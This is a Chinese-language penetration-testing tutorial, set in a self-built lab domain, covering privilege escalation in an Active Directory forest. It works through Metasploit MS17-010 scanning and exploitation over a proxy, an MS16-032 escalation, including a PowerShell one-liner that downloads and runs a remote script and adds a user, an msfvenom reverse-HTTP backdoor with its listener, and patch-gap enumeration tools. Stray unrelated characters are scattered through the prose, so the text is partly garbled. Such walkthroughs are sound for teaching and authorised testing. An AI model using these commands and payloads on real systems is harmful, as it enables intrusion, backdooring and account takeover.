滲透測試之地基內(nèi)網(wǎng)篇：域森林中權(quán)限提升

滲透測試-地基篇

該篇章目的是重新牢固地基燎斩，加強每日訓(xùn)練操作的筆記，在記錄地基筆記中會有很多跳躍性思維的操作和方式方法喉钢，望大家能共同加油學(xué)到東西严望。

請注意：

本文僅用于技術(shù)討論與研究，對于所有筆記中復(fù)現(xiàn)的這些終端或者服務(wù)器笆环，都是自行搭建的環(huán)境進(jìn)行滲透的。我將使用Kali Linux作為此次學(xué)習(xí)的攻擊者機器厚者。這里使用的技術(shù)僅用于學(xué)習(xí)教育目的躁劣，如果列出的技術(shù)用于其他任何目標(biāo)，本站及作者概不負(fù)責(zé)库菲。

名言：

你對這行的興趣账忘，決定你在這行的成就！

一、前言

滲透測試人員需謹(jǐn)記《網(wǎng)絡(luò)安全法》鳖擒，根據(jù)《網(wǎng)絡(luò)安全法》所示溉浙，未經(jīng)授權(quán)的滲透測試都是不合法的，不管是出于何種目的蒋荚。紅隊滲透人員在進(jìn)行滲透期間放航，滲透測試的行為和項目必須在被滲透方授予權(quán)限可滲透后，才可進(jìn)行滲透測試操作圆裕。

如今有一家dayu公司，需要對自己的業(yè)務(wù)以及整體的內(nèi)網(wǎng)框架體系進(jìn)行隱患挖掘荆几，授予權(quán)限我進(jìn)行對dayu公司的滲透測試操作吓妆，在簽署了雙方的《滲透測試授權(quán)書》后，我開始了對dayu公司的滲透之旅吨铸。

那么我通過了社工釣魚的各種方式行拢，將釣魚文件進(jìn)行免殺后，成功釣魚到了該公司外圍人員計算機并控制了該計算機權(quán)限獲得shell并成功登錄對方電腦诞吱。

通過前期對域用戶大量的信息收集舟奠，畫出了相對應(yīng)的簡單網(wǎng)絡(luò)拓?fù)鋱D，下一步需要進(jìn)攻子域控制器房维，思路如下：

域普通用戶 -> 子域控制器 -> 父域控制器 ->輔域控制器

通過該思路進(jìn)攻即可沼瘫，還有另外一條思路：

域普通用戶 -> 10.10.21.0/24二級區(qū)域 -> 繼續(xù)延伸

滲透人員最愛系統(tǒng)之一有kali，還有各類windows集成的武器庫系統(tǒng)咙俩，通過上期隱藏通信隧道技術(shù)已經(jīng)在內(nèi)網(wǎng)域森林中建立了一級隧道耿戚，今天我們就來對子域控制器進(jìn)行提權(quán)，總結(jié)實戰(zhàn)中會遇到的權(quán)限提升的各種方法阿趁，利用這些方法在內(nèi)網(wǎng)中遨游膜蛔！

不會權(quán)限提升技術(shù)，就無法對內(nèi)網(wǎng)機器進(jìn)行進(jìn)一步的滲透２闭蟆皂股！

二、環(huán)境介紹

目前信息收集獲得的網(wǎng)絡(luò)情況：（模擬環(huán)境）

拓?fù)鋱D簡介

接下來將演示分析內(nèi)網(wǎng)中的權(quán)限提升各種方法命黔，利用該方法在域森林中旅行呜呐！

三、MSF-永恒之藍(lán)

在信息收集階段纷铣，已知子域控xiyou.dayu.com存活卵史，那么實戰(zhàn)內(nèi)網(wǎng)最經(jīng)典的漏洞就是永恒之藍(lán)。

在2017年4月搜立，轟動網(wǎng)絡(luò)安全界的事件無疑是TheShadowBrokers放出的一大批美國國家安全局(NSA)方程式組織( Equation Group )使用的極具破壞力的黑客工具以躯，其中包括可以遠(yuǎn)程攻破約70%的Windows服務(wù)器的漏洞利用工具。一夜之間，全世界70%的Wndows服務(wù)器處于危險之中忧设，國內(nèi)使用Windows服務(wù)器的高校刁标、企業(yè)甚至政府機構(gòu)都不能幸免。這無疑是互聯(lián)網(wǎng)的一次“大地震”址晕，因為已經(jīng)很久沒有出現(xiàn)過像“永恒之藍(lán)”(MS17-010) 這種級別的漏洞了膀懈。

Mtsploit是當(dāng)今安全專業(yè)人員免費提供的最有用的審計工具之一！新版本的Mtsploit已經(jīng)集成了MS17-010漏洞的測試模塊谨垃，接下來將利用該工具進(jìn)行內(nèi)網(wǎng)最初提權(quán)启搂！

通過上一期《域森林中多級域通信隧道（下）》建立了Frp內(nèi)網(wǎng)隧道代理。

1刘陶、MSF基礎(chǔ)認(rèn)知

該圖是Metasploit 體系結(jié)構(gòu)胳赌，了解后可知MSF框架可利用外部安全工具配合內(nèi)部插件鏈接基礎(chǔ)庫文件，基礎(chǔ)庫文件有生成后門shell的功能程序和開啟MSF功能的接口匙隔。

2疑苫、MSF文件系統(tǒng)

通過Kali可以查看到12種相關(guān)永恒之藍(lán)（MS17-010）的漏洞詳情，其中利用的模塊也詳細(xì)介紹到XP~2008R2范圍內(nèi)系統(tǒng)存在該漏洞纷责，目前攻擊的子域控制器在信息收集后還不清楚是什么系統(tǒng)捍掺，那么就來嘗試下進(jìn)攻的旅行感！

3再膳、進(jìn)攻子域控制器

1）MSF掛載代理

setg Proxies socks5:192.168.253.11:7777

setg ReverseAllowProxy true

MSF自帶掛載代理功能挺勿，只需要執(zhí)行兩條命令即可將VPS上建立的隧道代理通道掛載到Kali-MSF上進(jìn)行橫向滲透！

2）MSF橫向滲透

目前掛載好代理后饵史，Kali-MSF就可以對域森林進(jìn)行橫向滲透了满钟，開始！

search ms17-010

查詢ms17-010存在的EXP類型胳喷，先利用auxiliary對子域控制器進(jìn)行探測：

use auxiliary/scanner/smb/smb_ms17_010

填入RHOSTS攻擊方子域控制器的IP地址：

run執(zhí)行后auxiliary腳本通過隧道對域森林中子域控制器進(jìn)行了掃描湃番，發(fā)現(xiàn)VULNERABLE（存在漏洞），以及子域控制器的系統(tǒng)為：Windows Server 2016 Standard 14393 x64 (64-bit)？月丁吠撮！

經(jīng)過前面對MS17-010的了解，XP~2008R2范圍內(nèi)系統(tǒng)存在該漏洞讲竿，win 2016是不存在的泥兰！嘗試攻擊看看！

3）探測攻擊

use exploit/windows/smb/ms17_010_eternalblue

利用exploit腳本進(jìn)行攻擊题禀，填入攻擊的IP開啟攻擊：

通過現(xiàn)場模擬鞋诗，發(fā)現(xiàn)子域控制器藍(lán)屏了！迈嘹！

所以在掃描發(fā)現(xiàn)windows2016系統(tǒng)版本后削彬，不應(yīng)該進(jìn)行繼續(xù)的進(jìn)攻了全庸，進(jìn)攻只會導(dǎo)致藍(lán)屏現(xiàn)象！域控藍(lán)屏?xí)?dǎo)致整個子域用戶環(huán)境影響工作融痛！動靜非常大壶笼，那么接下來利用另外一種方法拿下子域控制器！

4雁刷、成功拿下域控

通過前面發(fā)現(xiàn)直接exp攻擊windows 2016是不可行的覆劈，但在auxiliary腳本掃描結(jié)果是VULNERABLE存在漏洞行為，那么怎么攻擊呢沛励？永恒之藍(lán)還有另外一種攻擊方式责语，command方式就是獲得對方的CMD終端交互權(quán)限！開始目派！

1）ms17_010_command查詢

search admin/smb

可看到存在一個探測利用腳本：auxiliary/admin/smb/ms17_010_command鹦筹，該exp腳本屬于command命令輸入模式，運行址貌！

2）ms17_010_command攻擊

use auxiliary/admin/smb/ms17_010_command

set輸入域控IP和command交互Ipconfig命令后執(zhí)行run，利用成功徘键，可看到ipconfig輸入后回顯出了子域控制器的IP情況练对，和信息收集到的情況一樣！

那么command相當(dāng)于拿到了域控的cmd窗口命令吹害，那這里在旅行中基本能暢游子域控制器了螟凭！

四、權(quán)限提升-系統(tǒng)補丁

1它呀、簡介

在Windows環(huán)境中螺男，權(quán)限大概分為四種：分別是User、Administrator纵穿、System下隧、TrustedInstaller。在這四種權(quán)限中谓媒，我們經(jīng)常接觸的是前三種淆院。第四種權(quán)限 TrustedInstaller，在常規(guī)使用中通常不會涉及句惯。

詳情：

1. User:普通用戶權(quán)限土辩，是系統(tǒng)中最安全的權(quán)限。

2. Administrator:管理員權(quán)限抢野】教裕可以利用Windows 的機制將自己提升為System權(quán)限，以便操作SAM文件等指孤。

3. System:系統(tǒng)權(quán)限启涯。可以對SAM等敏感文件進(jìn)行讀取，往往需要將Administrator權(quán)限提升到System權(quán)限才可以對散列值進(jìn)行Dump操作逝嚎。

4. TrustedInstaller:Windows中的最高權(quán)限扁瓢。對系統(tǒng)文件，即使擁有System權(quán)限也無法進(jìn)行修改补君。只有擁有TrustedInstaller權(quán)限的用戶才可以修改系統(tǒng)文件引几。

低權(quán)限級別將使?jié)B透測試受到很多限制。在Windows中挽铁，如果沒有管理員權(quán)限,就無法進(jìn)行獲取散列值伟桅、安裝軟件、修改防火墻規(guī)則叽掘、修改注冊表等操作楣铁。

常用的提權(quán)方法有系統(tǒng)內(nèi)核溢出漏洞提權(quán)、數(shù)據(jù)庫提權(quán)更扁、錯誤的系統(tǒng)配置提權(quán)盖腕、組策略首選項提權(quán)、Web 中間件漏洞提權(quán)浓镜、DLL 劫持提權(quán)溃列、濫用高權(quán)限令牌提權(quán)、第三方軟件/服務(wù)提權(quán)等等膛薛，接下來將逐一介紹提權(quán)的方式方法听隐！

2、系統(tǒng)補丁收集

通過釣魚哄啄、web滲透等方式獲得的webshell可能是低權(quán)用戶雅任，那么需要進(jìn)行權(quán)限提升為system/administrator權(quán)限，操作系統(tǒng)中不管是windows還是linux咨跌，存在兩種提權(quán)方式：

1. 縱向提權(quán):低權(quán)限角色獲得高權(quán)限角色的權(quán)限沪么。例如，一個 WebShell權(quán)限通過提權(quán),擁有了管理員權(quán)限,這種提權(quán)就是縱向提權(quán),也稱作權(quán)限升級锌半。

2. 橫向提權(quán):獲取同級別角色的權(quán)限成玫。例如，在系統(tǒng)A中獲取了系統(tǒng)B的權(quán)限拳喻，這種提權(quán)就屬于橫向提權(quán)哭当。

常用的提權(quán)方法有系統(tǒng)內(nèi)核溢出漏洞提權(quán)、數(shù)據(jù)庫提權(quán)冗澈、錯誤的系統(tǒng)配置提權(quán)钦勘、組策略首選項提權(quán)、Web 中間件漏洞提權(quán)亚亲、DLL 劫持提權(quán)彻采、濫用高權(quán)限令牌提權(quán)腐缤、第三方軟件/服務(wù)提權(quán)等。

那么如何提權(quán)離不開信息收集的強度肛响，接下來將介紹通過手動執(zhí)行命令發(fā)現(xiàn)缺失補丁的方法岭粤！

3、手動發(fā)現(xiàn)缺失補丁

建立在獲取到對方的shell后進(jìn)行的操作

1）通過whoami /groups查看當(dāng)前權(quán)限

2）查看系統(tǒng)補丁

systeminfo

Wmic qfe get Caption,Description,HotFixID,InstalledOn

目前只安裝KB3199986特笋，KB3200970兩個補短杲健！

3）對系統(tǒng)補丁包進(jìn)行過濾查找指定補丁

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"kb3143141" /C:"KB976902"

可看到高危exp的kb補丁都未打的猎物，補丁kb庫詳見：

https://github.com/SecWiki/windows-kernel-exploits

4虎囚、MS16-032

此漏洞影響從Vista到Windows 10的所有Windows版本（包括服務(wù)器版本）以及為了實現(xiàn)利用，因為PowerShell腳本指示需要滿足以下要求：目標(biāo)系統(tǒng)需要有2個以上的CPU核心 PowerShell v2.0及更高版本必須正在運行蔫磨。

Windows Vista

Windows 7

Windows 8.1

Windows 10

Windows 2008 Server

Windows 2012 Server

通過上面簡單的補丁信息收集淘讥，如果目標(biāo)機器存在MS16-032（KB3139914)漏洞，可以通過metasploit或者powershell下的Invoke-MS16-032.ps1腳本進(jìn)行提權(quán)堤如，通過ps腳本可以執(zhí)行任意程序蒲列，且可以帶參數(shù)執(zhí)行，無彈窗搀罢。

腳本下載地址：

https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1

1）本地執(zhí)行

\Invoke-MS16-032.ps1

Import-Module .\Invoke-MS16-032.ps1

Invoke-MS16-032 -Application cmd.exe -Commandline "/c net user dayu1 dayu1 /add"

#添加用戶1密碼1

目前只是簡單的告知該一種方法嫉嘀，很多EXP都可以去github上下載操作提權(quán)！

2）遠(yuǎn)程執(zhí)行

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user dayutest test123 /add'"

#遠(yuǎn)程下載魄揉，提權(quán)，添加用戶

如果在內(nèi)網(wǎng)環(huán)境拭宁，把腳本部署在能訪問的web服務(wù)器目錄中即可洛退！

5、利用Metasploit發(fā)現(xiàn)缺失補丁

在永恒之藍(lán)部分已經(jīng)教會大家如何簡單實用Metasploit杰标，Metasploit也包含了如何發(fā)現(xiàn)補丁缺失甚至是可以利用什么exp對機器進(jìn)行提權(quán)等兵怯。

為了更好的體驗Metasploit發(fā)現(xiàn)補丁之旅，我進(jìn)行了木馬上傳進(jìn)行真實操作顯現(xiàn)給小伙伴們看腔剂。

1）首先生成exe后門

msfvenom -p windows/x64/meterpreter_reverse_http LHOST=192.168.253.27 LPORT=4444 -f exe >1.exe

msfvenom生成MSF的后門exe文件媒区。

2）開啟監(jiān)聽

msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter_reverse_http; set lhost 192.168.253.27; set lport 4444; exploit -j; "

一句話將開啟MSF監(jiān)聽模式。

3）上傳web服務(wù)器并運行

將1.exe免殺或者直接上傳到web服務(wù)器進(jìn)行演示掸犬，成功獲得對方shell袜漩。

4）運行補丁模塊

use post/windows/gather/enum_patches

set session 1

run

可看到該web服務(wù)器只打了三個補丁：KB2534111湾碎、KB2999226宙攻、KB976902。

5）運行漏掃模塊

使用msf找出系統(tǒng)中可能被利用的漏洞：

use post/multi/recon/local_exploit_suggester

set session 1

可看到列出了五種exp的方法介褥，bypassuac_sdclt座掘、cve_2019_1458递惋、bypassuac_dotnet_profiler、ms10_092_schelevator溢陪、ms16_014_wmi_recv_notif等等萍虽，甚至都有運行模塊的exp腳本，直接運行提權(quán)即可形真！

6杉编、Windows Exploit Suggester

Windows Exploit Suggester該工具可以將系統(tǒng)中已經(jīng)安裝的補丁程序和微軟的漏洞數(shù)據(jù)庫進(jìn)行比較，并可以識別可能導(dǎo)致權(quán)限提升的漏洞没酣。該庫需要不定時的進(jìn)行更新在自己的武器庫內(nèi)王财，漏洞是隨著時代更新而更新的!

1）kali下載

git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester

成功在github上下載到本地kali

2）從微軟官網(wǎng)自動下載安全公告數(shù)據(jù)庫

/windows-exploit-suggester.py --update

可看到更新到4月8號最新的庫！

3）安裝xlrd模塊

pip install xlrd --upgrade

4）查找shell系統(tǒng)版本信息

systeminfo > dayu.txt

5）執(zhí)行

將dayu.txt放入kali：

/windows-exploit-suggester.py --database 2021-04-08-mssb.xls --systeminfo dayu.txt

可發(fā)現(xiàn)能利用的補丁和exp名稱裕便，然后找到對應(yīng)的exp執(zhí)行即可绒净！

7、Powershe中的 Sherlock

Powershe中的 Sherlock腳本偿衰，可快速查找可能用于本地權(quán)限提升的漏洞挂疆。

下載地址：

https://github.com/rasta-mouse/Sherlock

Import-Module .\Sherlock.ps1

Find-AllVulns

在CS3以上的版本都已經(jīng)添加了elevate功能，也可以利用CS掃描下翎！

五缤言、總結(jié)

通過MSF-永恒之藍(lán)，熟悉MSF框架的簡單使用视事，利用MSF框架的exp控制子域控制器機器胆萧，在權(quán)限提升系統(tǒng)補丁發(fā)現(xiàn)系列中，介紹了六種系統(tǒng)補丁挖掘的辦法俐东，非常的實用在實戰(zhàn)當(dāng)中跌穗，發(fā)現(xiàn)了可利用的系統(tǒng)內(nèi)核漏洞提權(quán)后，就可以通過漏洞提權(quán)獲得最高權(quán)限更好的控制對方機器虏辫。

系統(tǒng)內(nèi)核溢出漏洞提權(quán)是一種通用的提權(quán)方法蚌吸，攻擊者通常可以使用該方法繞過系統(tǒng)的所有安全限制砌庄。攻擊者利用該漏洞的關(guān)鍵是目標(biāo)系統(tǒng)沒有及時安裝補丁---即使微軟已經(jīng)針對某個漏洞發(fā)布了補丁羹唠，但如果系統(tǒng)沒有立即安裝補丁，就會讓攻擊者有機可乘娄昆。然而佩微，這種提權(quán)方法也存在一定的局限性，如果目標(biāo)系統(tǒng)的補丁更新工作較為迅速和完整萌焰，那么攻擊者要想通過這種方法提權(quán)喊衫，就必須找出目標(biāo)系統(tǒng)中的0day漏洞。

不會權(quán)限提升exp收集杆怕，就無法在內(nèi)網(wǎng)中旅行族购，無法見到更多的風(fēng)景壳贪，學(xué)習(xí)今天的exp信息收集的方法，利用對應(yīng)的EXP模塊進(jìn)行內(nèi)核提權(quán)寝杖，就可以在該公司域森林中遨游了!

公司域森林搭建 -> 域森林信息收集上 -> 域森林信息收集下 -> 域森林通信隧道建立上 -> 域森林通信隧道建立下 -> 域森林中權(quán)限提升上 -> ......

希望大家提高安全意識违施，沒有網(wǎng)絡(luò)安全就沒有國家安全！

今天基礎(chǔ)牢固就到這里瑟幕，雖然基礎(chǔ)磕蒲，但是必須牢記于心。希望大家點贊加關(guān)注哦